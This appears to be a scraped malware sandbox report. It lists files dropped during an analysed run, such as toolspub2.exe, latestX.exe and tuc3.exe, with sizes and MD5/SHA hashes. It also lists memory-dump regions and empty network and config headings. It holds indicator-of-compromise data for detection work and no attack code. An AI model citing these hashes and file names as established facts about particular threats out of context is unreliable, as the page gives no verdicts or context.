C:\Users\Admin\AppData\Local\Temp\is-U6918.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U6918.tmp\_isetup\_isdecmp.dll

Filesize
13KB

MD5
a813d18268affd4763dde940246dc7e5

SHA1
c7366e1fd925c17cc6068001bd38eaef5b42852f

SHA256
e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

SHA512
b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U6918.tmp\_isetup\_isdecmp.dll

Filesize
13KB

MD5
a813d18268affd4763dde940246dc7e5

SHA1
c7366e1fd925c17cc6068001bd38eaef5b42852f

SHA256
e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

SHA512
b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\latestX.exe

Filesize
5.6MB

MD5
bae29e49e8190bfbbf0d77ffab8de59d

SHA1
4a6352bb47c7e1666a60c76f9b17ca4707872bd9

SHA256
f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

SHA512
9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Filesize
282KB

MD5
2edd463e1e0eb9ee47c8c652292376fd

SHA1
4489c3b20a3a6d2f97838371a53c6d1a25493359

SHA256
d2a392c59f9985f753b9a10f03a7a567f21747ff3a7589722f22748a005953e7

SHA512
d964b77fbb92910909415f5fe7823984752f03d3cda4051da95f8b075ecf4bffa16acc8716f7fe79a017251438f415c41526bfa6245e8e1bab73da4113e99516

Download Submit
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Filesize
282KB

MD5
2edd463e1e0eb9ee47c8c652292376fd

SHA1
4489c3b20a3a6d2f97838371a53c6d1a25493359

SHA256
d2a392c59f9985f753b9a10f03a7a567f21747ff3a7589722f22748a005953e7

SHA512
d964b77fbb92910909415f5fe7823984752f03d3cda4051da95f8b075ecf4bffa16acc8716f7fe79a017251438f415c41526bfa6245e8e1bab73da4113e99516

Download Submit
C:\Users\Admin\AppData\Local\Temp\tuc3.exe

Filesize
3.3MB

MD5
9d203bb88cfaf2a9dc2cdb04d888b4a2

SHA1
4481b6b9195590eee905f895cce62524f970fd51

SHA256
ba8a003d3491205e5e43c608daa1a51087d43dfe53260eb82227ddfb7448d83b

SHA512
86790d21b2731f36c9e1f80b617e016c37a01b3d8bb74dc73f53387b2c57dfd301f936f9ec6bc8d9750870ffcd7bb3dedb92c41c07eb0b519961e029aff2996d

Download Submit
C:\Users\Admin\AppData\Roaming\wabzaZXb.exe

Filesize
948KB

MD5
17b10059937dfd719ed14ccf111d0879

SHA1
b71db6b40d8b7749c979fd20a98c45489b5631bd

SHA256
eaab9f6775fbec120229d909a457058334c79609fd8c92bb99a2b186b34ed5df

SHA512
faae0e883550c9bded3bb13660f1a92ea7038ca75a431d90e503db9d5f2d97a5b04e02567739aad01e4457b3ac177e389667a510783d3e3455a548b98853fa80

Download Submit
memory/856-176-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/856-404-0x00000000051F0000-0x000000000523C000-memory.dmp

Filesize
304KB

Download
memory/856-348-0x0000000004A10000-0x0000000004A22000-memory.dmp

Filesize
72KB

Download
memory/856-332-0x0000000004AC0000-0x00000000050D8000-memory.dmp

Filesize
6.1MB

Download
memory/856-207-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/856-180-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/856-175-0x00000000001D0000-0x00000000001FE000-memory.dmp

Filesize
184KB

Download
memory/956-350-0x00000000083A0000-0x00000000084AA000-memory.dmp

Filesize
1.0MB

Download
memory/956-83-0x00000000077B0000-0x00000000077BA000-memory.dmp

Filesize
40KB

Download
memory/956-70-0x00000000009E0000-0x0000000000A1E000-memory.dmp

Filesize
248KB

Download
memory/956-78-0x0000000007980000-0x0000000007990000-memory.dmp

Filesize
64KB

Download
memory/956-106-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/956-69-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/956-116-0x0000000007980000-0x0000000007990000-memory.dmp

Filesize
64KB

Download
memory/1200-275-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1200-130-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1460-239-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/1460-173-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/1608-75-0x000001D2DE2A0000-0x000001D2DE388000-memory.dmp

Filesize
928KB

Download
memory/1608-81-0x000001D2F89A0000-0x000001D2F8A80000-memory.dmp

Filesize
896KB

Download
memory/1608-117-0x000001D2F88B0000-0x000001D2F88C0000-memory.dmp

Filesize
64KB

Download
memory/1608-76-0x000001D2F88C0000-0x000001D2F899E000-memory.dmp

Filesize
888KB

Download
memory/1608-77-0x00007FF81BEA0000-0x00007FF81C961000-memory.dmp

Filesize
10.8MB

Download
memory/1608-79-0x000001D2F88B0000-0x000001D2F88C0000-memory.dmp

Filesize
64KB

Download
memory/1608-110-0x00007FF81BEA0000-0x00007FF81C961000-memory.dmp

Filesize
10.8MB

Download
memory/1608-86-0x000001D2F87F0000-0x000001D2F883C000-memory.dmp

Filesize
304KB

Download
memory/1608-85-0x000001D2F8B50000-0x000001D2F8C18000-memory.dmp

Filesize
800KB

Download
memory/1608-282-0x00007FF81BEA0000-0x00007FF81C961000-memory.dmp

Filesize
10.8MB

Download
memory/1608-82-0x000001D2F8A80000-0x000001D2F8B48000-memory.dmp

Filesize
800KB

Download
memory/1704-399-0x0000000008A00000-0x0000000008A3C000-memory.dmp

Filesize
240KB

Download
memory/1704-213-0x0000000002860000-0x000000000289C000-memory.dmp

Filesize
240KB

Download
memory/1704-351-0x0000000007900000-0x0000000007910000-memory.dmp

Filesize
64KB

Download
memory/1704-331-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2724-123-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2724-124-0x00000000001C0000-0x000000000117E000-memory.dmp

Filesize
15.7MB

Download
memory/2724-342-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2956-80-0x0000000007E30000-0x0000000007E40000-memory.dmp

Filesize
64KB

Download
memory/2956-58-0x0000000007C20000-0x0000000007CB2000-memory.dmp

Filesize
584KB

Download
memory/2956-55-0x0000000008130000-0x00000000086D4000-memory.dmp

Filesize
5.6MB

Download
memory/2956-119-0x0000000007E30000-0x0000000007E40000-memory.dmp

Filesize
64KB

Download
memory/2956-47-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2956-84-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2956-36-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/3152-170-0x0000000000A30000-0x0000000000B22000-memory.dmp

Filesize
968KB

Download
memory/3152-172-0x00000000053A0000-0x00000000053B0000-memory.dmp

Filesize
64KB

Download
memory/3152-420-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/3152-281-0x0000000005720000-0x0000000005726000-memory.dmp

Filesize
24KB

Download
memory/3152-271-0x00000000056C0000-0x00000000056D8000-memory.dmp

Filesize
96KB

Download
memory/3152-168-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/3292-93-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-111-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-99-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-103-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-41-0x0000000002870000-0x0000000002886000-memory.dmp

Filesize
88KB

Download
memory/3292-104-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-87-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-107-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-89-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-91-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-118-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-97-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-115-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-114-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-90-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-113-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-109-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-212-0x0000000002E50000-0x0000000002E66000-memory.dmp

Filesize
88KB

Download
memory/3292-95-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-102-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-96-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-108-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-92-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3292-105-0x0000000002970000-0x0000000002980000-memory.dmp

Filesize
64KB

Download
memory/3376-277-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/3376-206-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/3764-43-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/3764-39-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/3940-68-0x0000000000400000-0x000000000057C000-memory.dmp

Filesize
1.5MB

Download
memory/3940-28-0x0000000000400000-0x000000000057C000-memory.dmp

Filesize
1.5MB

Download
memory/3940-29-0x0000000000400000-0x000000000057C000-memory.dmp

Filesize
1.5MB

Download
memory/3940-32-0x0000000000400000-0x000000000057C000-memory.dmp

Filesize
1.5MB

Download
memory/3940-35-0x0000000000400000-0x000000000057C000-memory.dmp

Filesize
1.5MB

Download
memory/4448-355-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4448-383-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4660-283-0x0000000002650000-0x00000000026CE000-memory.dmp

Filesize
504KB

Download
memory/5392-425-0x0000000000400000-0x00000000006ED000-memory.dmp

Filesize
2.9MB

Download
memory/5392-394-0x0000000000400000-0x00000000006ED000-memory.dmp

Filesize
2.9MB

Download
memory/5576-354-0x0000018268C20000-0x0000018268D00000-memory.dmp

Filesize
896KB

Download
memory/5576-347-0x0000018268C20000-0x0000018268D00000-memory.dmp

Filesize
896KB

Download
memory/5576-322-0x00007FF81BEA0000-0x00007FF81C961000-memory.dmp

Filesize
10.8MB

Download
memory/5576-337-0x0000018266BB0000-0x0000018266BC0000-memory.dmp

Filesize
64KB

Download
memory/5576-269-0x0000000000400000-0x00000000004AA000-memory.dmp

Filesize
680KB

Download
memory/5576-341-0x0000018268C20000-0x0000018268D00000-memory.dmp

Filesize
896KB

Download
memory/5576-389-0x0000018268C20000-0x0000018268D00000-memory.dmp

Filesize
896KB

Download
memory/5576-276-0x0000018268C20000-0x0000018268D04000-memory.dmp

Filesize
912KB

Download
memory/5576-359-0x0000018268C20000-0x0000018268D00000-memory.dmp

Filesize
896KB

Download
memory/5576-410-0x0000018268C20000-0x0000018268D00000-memory.dmp

Filesize
896KB

Download
memory/5956-340-0x0000000000400000-0x00000000006ED000-memory.dmp

Filesize
2.9MB

Download
memory/5956-328-0x0000000000400000-0x00000000006ED000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request